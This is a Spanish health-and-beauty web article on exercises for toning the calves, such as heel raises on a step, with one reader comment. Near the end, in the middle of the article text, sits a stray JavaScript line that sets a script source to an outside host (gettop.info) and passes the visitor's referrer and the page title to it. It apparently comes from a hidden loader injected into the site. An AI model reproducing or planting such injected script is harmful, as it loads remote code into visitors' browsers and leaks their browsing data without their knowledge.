Salud y belleza » Salud, ejercicios

Los ejercicios recomendados para tonificar las pantorrillas

1 Comentario

pantorrillas-bonitasCada persona es diferente y tiene un cuerpo diferente. Sin embargo, hay muchas a las que les gustaría fortalecer sus pantorrillas, la parte posterior de la pierna bajo la rodilla, para tenerlas más bonitas y que de la impresión de unas piernas más finas y atractivas. Por eso en este artículo vamos a aconsejarte los ejercicios más adecuados para tonificar las pantorrillas. Sigue estos consejos y consigue unas piernas más moldeadas y bonitas.

Lo mejor para tonificar los músculos de las pantorrillas (los gemelos) es andar en bicicleta, correr o andar rápido. Se pueden realizar ejercicios sin salir de casa y con la misma efectividad. Busca algún elemento que te sirva de escalón y algo de peso para coger en la mano. Solo tienes que poner las puntillas en el escalón y dejar los talones en el aire, apoyando el peso del cuerpo sobre las puntas de los pies. Notarás cómo los gemelos van haciendo fuerza. Haz sesiones de varios segundos hasta que te canses. En unas semanas tus pantorrillas comenzarán a coger forma.

pantorrillas-ejerciciosTambién puedes probar a ponerte de puntillas sobre el borde del escalón, esta vez con una sola pierna. Sujeta con ambas manos algo de peso y ve bajando y subiendo sobre el pie. Es un ejercicio un poco más cansado pero mucho más rápido y efectivo. Ve cambiando de pierna cuando te canses.

Si realizas estos ejercicios durante varias semanas empezarás a notar tus pantorrillas más moldeadas. Acompaña los ejercicios con una dieta sana y tendrás en general un cuerpo mucho más bonito. Tonifica y define las pantorrillas con esta serie de ejercicios.

¿Practicas ejercicios para las pantorrillas?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • Mila said:

    Yo hago muchos ejercicios de pantorrillas porque la verdad es que me parece muy feo tener esa parte del cuerpo fofa y caída. es hasta vulgar.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.